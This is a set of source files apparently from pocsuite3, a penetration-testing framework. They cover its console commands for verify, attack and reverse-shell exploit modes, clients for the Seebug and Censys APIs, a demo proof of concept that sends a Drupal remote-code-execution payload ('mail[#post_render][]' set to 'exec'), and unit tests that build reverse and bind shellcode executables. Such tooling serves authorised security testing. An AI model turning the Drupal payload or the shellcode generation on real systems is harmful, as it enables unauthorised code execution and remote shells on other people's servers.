                scheme = "https"
            target = "{scheme}://{rhost}:{rport}".format(scheme=scheme, rhost=rhost, rport=rport)
        conf.mode = mod
        kb.task_queue.put((target, self.current_module))
        try:
            start()
        except PocsuiteShellQuitException:
            pass
        kb.results = []

    def _set_global_conf(self):
        """
        设置全局的参数

        :return:
        """
        if self.current_module.current_protocol == POC_CATEGORY.PROTOCOL.HTTP:
            conf.referer = self.current_module.getg_option("referer")
            conf.agent = self.current_module.getg_option("agent")
            conf.proxy = self.current_module.getg_option("proxy")
            conf.timeout = self.current_module.getg_option("timeout")
            # 设置全局参数

            _set_http_referer()
            _set_http_user_agent()
            _set_network_proxy()
            _set_network_timeout()

    @module_required
    def command_check(self, *args, **kwargs):
        self.current_module.check_requirement(self.current_module.global_options, self.current_module.options)
        # 检测必须参数是否被设置
        self._set_global_conf()
        self._attack_mode("verify")

    @module_required
    def command_verify(self, *args, **kwargs):
        self.command_check(args, kwargs)

    @module_required
    def command_attack(self, *args, **kwargs):
        # 检测必须参数是否被设置
        self.current_module.check_requirement(self.current_module.global_options, self.current_module.options)
        self._set_global_conf()
        self._attack_mode("attack")

    @module_required
    def command_run(self, *args, **kwargs):
        self.command_attack(args, kwargs)

    @module_required
    def command_exploit(self, *args, **kwargs):
        self.current_module.check_requirement(self.current_module.payload_options, self.current_module.global_options)
        self._set_global_conf()
        conf.connect_back_host = self.current_module.getp_option("lhost")
        conf.connect_back_port = self.current_module.getp_option("lport")
        conf.mode = "shell"
        conf.ipv6 = is_ipv6_address_format(conf.connect_back_host)
        _set_listener()
        self._attack_mode("shell")

    @module_required
    def command_shell(self, *args, **kwargs):
        self.command_exploit(args, kwargs)

    @module_required
    def command_setg(self, *args, **kwargs):
        key, _, value = args[0].partition(" ")
        if key in self.current_module.global_options:
            self.current_module.setg_option(key, value)
            logger.info("{} => {}".format(key, value))
        else:
            logger.error("You can't set option '{}'.\n"
                         "Available options: {}".format(key, self.current_module.options))

    def command_list(self, *args, **kwargs):
        # 展现所有可用的poc
        search_result = []
        tb = prettytable.PrettyTable(["Index", "Path", "Name"])
        index = 0
        for tmp_module in self.main_modules_dirs:
            found = os.path.join(paths.POCSUITE_ROOT_PATH, tmp_module + ".py")
            with open(found, encoding='utf-8') as f:
                code = f.read()
            name = get_poc_name(code)
            tb.add_row([str(index), tmp_module, name])
            search_result.append(tmp_module)
            index += 1
        data_to_stdout("\n" + tb.get_string() + "\n")
        self.last_search = search_result

    def _show_all(self, *args, **kwargs):
        if self.current_module is None:
            self.command_list(args, kwargs)
        else:
            self._show_info(args, kwargs)
            self._show_options(args, kwargs)

    @module_required
    def _show_info(self, *args, **kwargs):
        fields = ["name", "VulID", "version", "author", "vulDate", "createDate", "updateDate", "references",
                  "appPowerLink", "appName", "appVersion", "vulType", "desc"]
        msg = ""
        for field in fields:
            value = getattr(self.current_module, field, None)
            if value:
                value = str(value).strip()
                # for name highlight
                if field == "name":
                    value = colored(value, "green")
                msg = msg + "%-20s %-10s\n" % (field, value)
        data_to_stdout("\n")
        data_to_stdout(msg)
        data_to_stdout("\n")

    @module_required
    def _show_options(self, *args, **kwargs):
        global_options = self.current_module.global_options
        module_options = self.current_module.options
        payload_options = self.current_module.payload_options

        tb2 = prettytable.PrettyTable(["Name", "Current settings", "Type", "Descript"])
        for name, opt in global_options.items():
            value = opt.value
            if opt.require and value == "":
                value = colored("*require*", "red")
            tb2.add_row([name, value, opt.type, opt.description])
        data_to_stdout("\nTarget options:\n")
        data_to_stdout(tb2.get_string())
        data_to_stdout("\n")

        if module_options:
            tb = prettytable.PrettyTable(["Name", "Current settings", "Type", "Descript"])
            # add target option
            for name, opt in module_options.items():
                value = opt.value
                if opt.require and value == "":
                    value = colored("*require*", "red")
                tb.add_row([name, value, opt.type, opt.description])
            data_to_stdout("\nModule options:\n")
            data_to_stdout(tb.get_string())
            data_to_stdout("\n")

        # exploit payload
        if payload_options:
            tb3 = prettytable.PrettyTable(["Name", "Current settings", "Type", "Descript"])
            for name, opt in payload_options.items():
                value = opt.value
                if opt.require and value == "":
                    value = colored("*require*", "red")
                tb3.add_row([name, value, opt.type, opt.description])
            data_to_stdout("\nExploit payloads(using reverse tcp):\n")
            data_to_stdout(tb3.get_string())
            data_to_stdout("\n")

        data_to_stdout("\n")

    @stop_after(2)
    def complete_use(self, text, *args, **kwargs):

        if text:
            all_possible_matches = filter(lambda x: x.startswith(text), self.main_modules_dirs)

            matches = set()
            for match in all_possible_matches:
                head, sep, tail = match[len(text):].partition('.')
                if not tail:
                    sep = ""
                matches.add("".join((text, head, sep)))
            return list(matches)

        else:
            return self.main_modules_dirs

    @stop_after(2)
    def complete_show(self, text, *args, **kwargs):

        if text:
            all_possible_matches = filter(lambda x: x.startswith(text), self.show_sub_commands)
            return list(all_possible_matches)

        else:
            return self.show_sub_commands

    @module_required
    @stop_after(2)
    def complete_set(self, text, *args, **kwargs):
        all_options = self.current_module.get_options().keys()

        if text:
            all_possible_matches = filter(lambda x: x.startswith(text), all_options)
            return list(all_possible_matches)

        else:
            return []



from pocsuite3.lib.controller.controller import start
from pocsuite3.lib.core.common import single_time_warn_message
from pocsuite3.lib.core.data import conf, kb, logger, paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import PLUGIN_TYPE, POC_CATEGORY, VUL_TYPE
from pocsuite3.lib.core.option import init, init_options
from pocsuite3.lib.core.plugin import PluginBase, register_plugin
from pocsuite3.lib.core.poc import POCBase, Output
from pocsuite3.lib.core.register import (
    load_file_to_module,
    load_string_to_module,
    register_poc,
)
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT
from pocsuite3.lib.request import requests
from pocsuite3.lib.utils import get_middle_text, generate_shellcode_list, random_str
from pocsuite3.modules.ceye import CEye
from pocsuite3.modules.listener import REVERSE_PAYLOAD
from pocsuite3.modules.seebug import Seebug
from pocsuite3.modules.zoomeye import ZoomEye
from pocsuite3.modules.shodan import Shodan
from pocsuite3.modules.fofa import Fofa
from pocsuite3.modules.censys import Censys
from pocsuite3.modules.spider import crawl
from pocsuite3.modules.httpserver import PHTTPServer
from pocsuite3.shellcodes import OSShellcodes, WebShell
from pocsuite3.lib.core.interpreter_option import OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptString, \
    OptItems, OptDict

__all__ = (
    'requests', 'PluginBase', 'register_plugin',
    'PLUGIN_TYPE', 'POCBase', 'Output', 'AttribDict', 'POC_CATEGORY', 'VUL_TYPE',
    'register_poc', 'conf', 'kb', 'logger', 'paths', 'DEFAULT_LISTENER_PORT', 'load_file_to_module',
    'load_string_to_module', 'single_time_warn_message', 'CEye', 'Seebug',
    'ZoomEye', 'Shodan','Fofa','Censys', 'PHTTPServer', 'REVERSE_PAYLOAD', 'get_listener_ip', 'get_listener_port',
    'get_results', 'init_pocsuite', 'start_pocsuite', 'get_poc_options', 'crawl',
    'OSShellcodes', 'WebShell', 'OptDict', 'OptIP', 'OptPort', 'OptBool', 'OptInteger', 'OptFloat', 'OptString',
    'OptItems', 'OptDict', 'get_middle_text', 'generate_shellcode_list', 'random_str')


def get_listener_ip():
    return conf.connect_back_host


def get_listener_port():
    return conf.connect_back_port


def get_current_poc_obj():
    pass


def get_poc_options(poc_obj=None):
    poc_obj = poc_obj or kb.current_poc
    return poc_obj.get_options()


def get_results():
    return kb.results


def init_pocsuite(options):
    init_options(options)
    init()


def start_pocsuite():
    start()



import logging


def remove_extra_log_message():
    logger_names = [
        "paramiko",
        "paramiko.transport",
        "websockets",

    ]

    for logger_name in logger_names:
        try:
            logging.getLogger(logger_name).disabled = True
        except Exception:
            pass



import getpass
import json
from configparser import ConfigParser

from pocsuite3.lib.request import requests
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths


class Seebug():
    def __init__(self, conf_path=paths.POCSUITE_RC_PATH, username=None, password=None):
        self.headers = None
        self.token = None
        self.conf_path = conf_path
        self.username = username
        self.password = password

        if self.conf_path:
            self.parser = ConfigParser()
            self.parser.read(self.conf_path)
            try:
                self.token = self.parser.get("Telnet404", 'Jwt token')
            except Exception:
                pass

    def token_is_available(self):
        if self.token:
            headers = {'Authorization': 'JWT %s' % self.token}
            try:
                resp = requests.get('https://www.seebug.org/api/user/poc_list', headers=headers)
                if resp and resp.status_code == 200 and "id" in resp.json()[0]:
                    self.headers = headers
                    return True
            except Exception as ex:
                logger.error(str(ex))
        return False

    def new_token(self):
        data = '{{"username": "{}", "password": "{}"}}'.format(self.username, self.password)
        try:
            resp = requests.post('https://api.zoomeye.org/user/login', data=data, )
            if resp.status_code != 401 and "access_token" in resp.json():
                content = resp.json()
                self.token = content['access_token']
                self.headers = {'Authorization': 'JWT %s' % self.token}
                return True
        except Exception as ex:
            logger.error(str(ex))
        return False

    def check_account(self):
        if self.token_is_available():
            return True
        else:
            if self.username and self.password:
                if self.new_token():
                    self.write_conf()
                    return True
            else:
                username = input("Telnet404 email account:")
                password = getpass.getpass("Telnet404 password:")
                self.username = username
                self.password = password
                if self.new_token():
                    self.write_conf()
                    return True
                else:
                    logger.error("The username or password is incorrect. "
                                 "Please enter the correct username and password.")
                    return False

    def write_conf(self):
        if not self.parser.has_section("Telnet404"):
            self.parser.add_section("Telnet404")
        try:
            self.parser.set("Telnet404", "Jwt token", self.token)
            self.parser.write(open(self.conf_path, "w"))
        except Exception as ex:
            logger.error(str(ex))

    def get_available_pocs(self):
        if self.check_account():
            try:
                resp = requests.get('https://www.seebug.org/api/user/poc_list', headers=self.headers)
                if resp and resp.status_code == 200:
                    pocs = resp.json()
                    return pocs
            except Exception as ex:
                logger.error(str(ex))
        else:
            return []

    def search_poc(self, keyword):
        if self.check_account():
            try:
                resp = requests.get('https://www.seebug.org/api/user/poc_list?q=%s' % keyword, headers=self.headers)
                if resp and resp.status_code == 200:
                    pocs = json.loads(resp.text)
                    return pocs
            except Exception as ex:
                logger.error(str(ex))
        else:
            return []

    def fetch_poc(self, ssvid):
        if self.check_account():
            try:
                if ssvid and ssvid.startswith('ssvid-'):
                    ssvid = ssvid.split('ssvid-')[-1]
                resp = requests.get('https://www.seebug.org/api/user/poc_detail?id=%s' % ssvid, headers=self.headers)
                if resp and resp.status_code == 200 and "code" in resp.json():
                    poc = resp.json()['code']
                    return poc
                elif resp.status_code == 200 and "status" in resp.json() and resp.json()["status"] is False:
                    if "message" in resp.json():
                        msg = resp.json()["message"]
                        if msg == "没有权限访问此漏洞":
                            msg = "No permission to access the vulnerability POC"
                    else:
                        msg = "Unknown"
                    msg = "[PLUGIN] " + msg
                    raise Exception(msg)
            except Exception as ex:
                logger.error(str(ex))
        else:
            return None


if __name__ == "__main__":
    sb = Seebug()
    sb.fetch_poc(ssvid='12345')
    sb.get_available_pocs()
    sb.search_poc('dedecms')



"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, logger, VUL_TYPE
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = '97207'  # ssvid
    version = '1.0'
    author = ['seebug']
    vulDate = '2018-03-08'
    createDate = '2018-04-12'
    updateDate = '2018-04-13'
    references = ['https://www.seebug.org/vuldb/ssvid-97207']
    name = 'Drupal core Remote Code Execution'
    appPowerLink = ''
    appName = 'Drupal'
    appVersion = ''
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
    '''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _verify(self):
        result = {}
        flag = random_str(length=10)
        url = self.url.rstrip(
            '/') + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
        payload = {
            'form_id': 'user_register_form',
            '_drupal_ajax': '1',
            'mail[#post_render][]': 'exec',
            'mail[#type]': 'markup',
            'mail[#markup]': 'echo "{0}";'.format(flag)
        }

        resp = requests.post(url, data=payload)
        try:
            if '"data":"{0}'.format(flag) in resp.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Postdata'] = payload
        except Exception as ex:
            logger.error(str(ex))

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    _attack = _verify


register_poc(DemoPOC)



import unittest

from pocsuite3.lib.core.enums import OS, OS_ARCH
from pocsuite3.lib.utils import generate_shellcode_list


class TestCase(unittest.TestCase):
    def setUp(self):
        pass

    def test_windows_shellcode(self):
        _list = generate_shellcode_list(listener_ip='127.0.0.1', listener_port=8088)
        self.assertTrue(len(_list) > 0)

    def test_linux_shellcode(self):
        _list = generate_shellcode_list(listener_ip='127.0.0.1', listener_port=8088, os_target=OS.LINUX,
                                        os_target_arch=OS_ARCH.X86)
        self.assertTrue(len(_list) > 0)



import requests
from requests import Session
from requests_toolbelt.cookies.forgetful import ForgetfulCookieJar
from requests_toolbelt.multipart import MultipartDecoder
from requests_toolbelt.utils.dump import dump_response
from requests_toolbelt.utils.dump import dump_all
from .patch import patch_all

__all__ = (requests, Session, ForgetfulCookieJar, MultipartDecoder, dump_response, dump_all, patch_all)

# patch requests
patch_all()

# compatible older pocsutie
req = requests



import json
from configparser import ConfigParser

import requests

from pocsuite3.lib.core.data import paths, logger


class Censys():
    def __init__(self, conf_path=paths.POCSUITE_RC_PATH, uid='', secret=''):
        self.uid = uid
        self.secret = secret
        self.conf_path = conf_path
        self.credits = 0
        if self.conf_path:
            self.parser = ConfigParser()
            self.parser.read(self.conf_path)
            if not (self.secret or self.uid):
                try:
                    self.secret = self.parser.get("Censys", "secret")
                    self.uid = self.parser.get("Censys", "uid")
                except Exception:
                    pass

    def token_is_available(self):
        if self.secret and self.uid:
            try:
                resp = requests.get("https://censys.io/api/v1/account", auth=(self.uid, self.secret))
                if resp.status_code == 200 and "email" in resp.json():
                    logger.info("[PLUGIN] Censys login success email:{}".format(resp.json()["email"]))
                    self.credits = resp.json()["quota"]["allowance"] - resp.json()["quota"]["used"]
                    return True
            except Exception as ex:
                logger.error(ex)
        return False

    def check_token(self):
        if self.token_is_available():
            return True
        else:
            new_UID = input("Censys API UID:")
            new_secret = input("Censys API SECRET")
            self.uid = new_UID
            self.secret = new_secret
            if self.token_is_available():
                self.write_conf()
                return True
            else:
                logger.error("The shodan api token is incorrect. "
                             "Please enter the correct api token.")
                self.check_token()

    def write_conf(self):
        if not self.parser.has_section("Censys"):
            self.parser.add_section("Censys")
        try:
            self.parser.set("Censys", "secret", self.secret)
            self.parser.set("Censys", "uid", self.uid)
            self.parser.write(open(self.conf_path, "w"))
        except Exception as ex:
            logger.error(str(ex))

    def get_resource_info(self):
        if self.check_token():
            return True
        return False

    def search(self, dork, pages=1, resource='ipv4'):
        search_result = set()
        try:
            for page in range(1, pages + 1):
                url = "https://censys.io/api/v1/search/{}".format(resource)
                data = {
                    "query": dork,  # 搜索的关键字,
                    "fields": ["ip"],
                    "page": page
                }
                resp = requests.post(url, data=json.dumps(data), auth=(self.uid, self.secret))
                if resp and resp.status_code == 200 and "results" in resp.json():
                    content = resp.json()["results"]
                    for match in content:
                        ans = match["ip"]
                        search_result.add(ans)
        except Exception as ex:
            logger.error(str(ex))
        return search_result


if __name__ == '__main__':
    c = Censys()
    ret = c.search("apache")



import unittest
import os
from pocsuite3.api import OSShellcodes
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.enums import SHELLCODE_CONNECTION, OS, OS_ARCH


class TestCase(unittest.TestCase):
    def setUp(self):
        self.connect_back_ip = '127.0.0.1'
        self.bad_chars = ["\x00", "\x0a", "\x0d", "\x3b"]

        self.shellpath = os.path.join(paths.POCSUITE_TMP_PATH, "payload.jar")

    def tearDown(self):
        if os.path.exists(self.shellpath):
            os.unlink(self.shellpath)

    def test_win_x86_bind(self):
        os_target = OS.WINDOWS
        os_target_arch = OS_ARCH.X86
        dll_funcs = ["pcap_findalldevs", "pcap_close", "pcap_compile", "pcap_datalink",
                     "pcap_datalink_val_to_description",
                     "pcap_dump", "pcap_dump_close", "pcap_dump_open", "pcap_file", "pcap_freecode", "pcap_geterr",
                     "pcap_getevent", "pcap_lib_version", "pcap_lookupdev", "pcap_lookupnet", "pcap_loop",
                     "pcap_open_live",
                     "pcap_open_offline", "pcap_setfilter", "pcap_snapshot", "pcap_stats"]

        s = OSShellcodes(os_target, os_target_arch, self.connect_back_ip, 6666, self.bad_chars)
        connection_type = SHELLCODE_CONNECTION.BIND
        filename = 'osshell_x86_bind'
        filepath = os.path.join(paths.POCSUITE_TMP_PATH, filename) + '.exe'
        shellcode = s.create_shellcode(
            connection_type,
            encode='',
            make_exe=1,
            debug=0,
            # dll_inj_funcs=dll_funcs,
            filename=filename,
            # use_precompiled=False
        )

        self.assertTrue(os.path.exists(filepath))
        os.unlink(filepath)

    def test_win_x86_reverse(self):
        os_target = OS.WINDOWS
        os_target_arch = OS_ARCH.X86
        dll_funcs = ["pcap_findalldevs", "pcap_close", "pcap_compile", "pcap_datalink",
                     "pcap_datalink_val_to_description",
                     "pcap_dump", "pcap_dump_close", "pcap_dump_open", "pcap_file", "pcap_freecode", "pcap_geterr",
                     "pcap_getevent", "pcap_lib_version", "pcap_lookupdev", "pcap_lookupnet", "pcap_loop",
                     "pcap_open_live",
                     "pcap_open_offline", "pcap_setfilter", "pcap_snapshot", "pcap_stats"]

        s = OSShellcodes(os_target, os_target_arch, self.connect_back_ip, 6666, self.bad_chars)
        connection_type = SHELLCODE_CONNECTION.REVERSE
        filename = 'osshell_x86_reverse'
        filepath = os.path.join(paths.POCSUITE_TMP_PATH, filename) + '.exe'
        shellcode = s.create_shellcode(
            connection_type,
            encode='',
            make_exe=1,
            debug=0,
            # dll_inj_funcs=dll_funcs,
            filename=filename,
            # use_precompiled=False
        )

        self.assertTrue(os.path.exists(filepath))
        os.unlink(filepath)

    def test_win_x64_bind(self):
        pass

    def test_win_x64_reverse(self):
        pass

    def test_linux_x86_bind(self):
        pass

    def test_linux_x86_reverse(self):
        pass

    def test_linux_x64_bind(self):
        pass

    def test_linux_x64_reverse(self):
        pass
